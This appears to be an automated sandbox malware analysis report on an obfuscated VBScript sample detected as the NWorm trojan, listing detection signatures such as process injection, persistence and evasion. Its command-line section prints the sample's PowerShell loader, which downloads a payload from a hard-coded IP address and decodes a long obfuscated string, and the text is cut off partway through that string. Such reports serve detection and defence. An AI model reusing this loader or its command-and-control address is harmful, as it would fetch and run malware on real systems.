Edit tour
Windows
Analysis Report
IUGSPQTEVLEHZIDHGXNQCNHSLWPLEZEYTVKQTSPNFSUAGHIJDDWITOGIYIHRFQGEIXYB.VBS
Overview
General Information
Detection
NWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Antivirus detection for URL or domain
Yara detected NWorm
Yara detected Powershell download and execute
Sigma detected: Suspicious Script Execution From Temp Folder
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Very long command line found
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates an undocumented autostart registry key
Sigma detected: WScript or CScript Dropper
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sigma detected: Encoded PowerShell Command Line
Java / VBScript file with very long strings (likely obfuscated code)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Uses cacls to modify the permissions of files
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64
- wscript.exe (PID: 6892 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\D esktop\IUG SPQTEVLEHZ IDHGXNQCNH SLWPLEZEYT VKQTSPNFSU AGHIJDDWIT OGIYIHRFQG EIXYB.VBS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 7064 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $Hx = 'Htt P://103.15 1.125.186/ C/Ps1JDK.t xt';Functi on RRBP([s tring] $KU FB) {$sFKU = [system .Collectio ns.Generic .list[Byte ]]::new(); for ($AHYV = 0; $AHY V -lt $KUF B.lengtH; $AHYV +=8) {$sFKU.Ad d([Convert ]::ToByte( $KUFB.subs tring($AHY V, 8), 2)) }return [s ystem.Text .encoding] ::AsCII.Ge tstring($s FKU.ToArra y())};$eZH V = RRBP ' OWUT1OWUT1 1OWUT11OWU T111OWUTOW UT11OWUT11 1OWUT1OWUT OWUTOWUT1O WUT1OWUTOW UT1OWUTOWU T1OWUTOWUT 1OWUTOWUT1 OWUT1OWUTO WUT111OWUT OWUT1OWUTO WUTOWUT111 OWUT1OWUT1 11OWUT1OWU TOWUT111OW UT1OWUTOWU TOWUT111OW UT1OWUTOWU T11OWUT1OW UT1OWUTOWU T11OWUT111 1OWUT1OWUT OWUT1OWUTO WUT1OWUT11 OWUT111OWU TOWUTOWUT1 OWUT1OWUTO WUTOWUTOWU TOWUT1OWUT OWUT111OWU TOWUT1OWUT OWUT111OWU TOWUT1OWUT 11OWUTOWUT OWUTOWUT1O WUT1OWUTOW UTOWUTOWUT OWUT1OWUT1 OWUTOWUTOW UTOWUTOWUT 11OWUT111O WUTOWUT11O WUT11OWUTO WUTOWUT1OW UT11OWUTOW UTOWUTOWUT 11OWUT11OW UTOWUTOWUT 11OWUT1OWU TOWUTOWUTO WUT1OWUT11 OWUTOWUTOW UTOWUT1OWU TOWUTOWUTO WUTOWUTOWU TOWUT111OW UTOWUT1OWU TOWUT11OWU TOWUT11OWU TOWUT1OWUT 11OWUTOWUT OWUTOWUT1O WUTOWUTOWU TOWUTOWUTO WUTOWUT11O WUT1OWUTOW UTOWUTOWUT 11OWUT1OWU T1OWUTOWUT 1OWUT11OWU TOWUTOWUTO WUT11OWUT1 11OWUTOWUT 11OWUT1OWU T1OWUTOWUT 1OWUTOWUTO WUTOWUTOWU TOWUTOWUT1 OWUT11OWUT OWUTOWUTOW UT111OWUTO WUT1OWUTOW UT11OWUT11 OWUTOWUTOW UT1OWUT11O WUTOWUTOWU TOWUT1OWUT OWUTOWUTOW UTOWUTOWUT OWUT11OWUT OWUTOWUT1O WUTOWUT11O WUTOWUTOWU T1OWUTOWUT 11OWUT1OWU TOWUTOWUTO WUT1OWUT11 OWUTOWUTOW UTOWUT1OWU TOWUTOWUTO WUTOWUTOWU TOWUT11OWU T1OWUTOWUT OWUTOWUT11 OWUTOWUTOW UTOWUTOWUT OWUT1OWUTO WUTOWUTOWU TOWUTOWUTO WUT1OWUT11 OWUTOWUTOW UTOWUT11OW UT111OWUTO WUT11OWUT1 OWUTOWUTOW UTOWUT1OWU T11OWUTOWU TOWUTOWUT1 OWUTOWUTOW UTOWUTOWUT OWUTOWUT11 OWUTOWUTOW UT1OWUTOWU T11OWUTOWU TOWUTOWUTO WUTOWUT11O WUTOWUT11O WUTOWUT1OW UT11OWUTOW UTOWUTOWUT 11OWUTOWUT OWUT1OWUTO WUT11OWUTO WUTOWUT1OW UTOWUT11OW UTOWUTOWUT 1OWUTOWUT1 OWUT11OWUT OWUTOWUTOW UT111OWUTO WUT1OWUTOW UT11OWUT11 OWUTOWUTOW UT1OWUT11O WUTOWUTOWU TOWUT11OWU TOWUTOWUT1 OWUTOWUT11 OWUTOWUTOW UTOWUTOWUT OWUT11OWUT OWUT1OWUTO WUTOWUT1OW UT11OWUTOW UTOWUTOWUT 1OWUTOWUTO WUTOWUTOWU TOWUTOWUT1 1OWUTOWUTO WUT1OWUTOW UT11OWUTOW UTOWUT1OWU TOWUT11OWU TOWUT11OWU TOWUT1OWUT 11OWUTOWUT OWUTOWUT11 OWUTOWUT11 OWUTOWUT11 OWUT111OWU TOWUT1OWUT 11OWUTOWUT OWUTOWUT1O WUTOWUTOWU TOWUTOWUTO WUTOWUT11O WUT111OWUT OWUT11OWUT 1OWUT1OWUT OWUT1OWUT1 1OWUTOWUTO WUTOWUT111 OWUTOWUT1O WUTOWUT11O WUT11OWUTO WUTOWUT1OW UT11OWUTOW UTOWUTOWUT 11OWUTOWUT OWUT1OWUTO WUT11OWUTO WUTOWUT1OW UTOWUT11OW UTOWUT11OW UTOWUT1OWU TOWUTOWUTO WUTOWUTOWU TOWUT1OWUT 11OWUTOWUT OWUTOWUT11 OWUT1OWUTO WUTOWUTOWU T11OWUTOWU T11OWUTOWU T1OWUTOWUT OWUTOWUTOW UTOWUTOWUT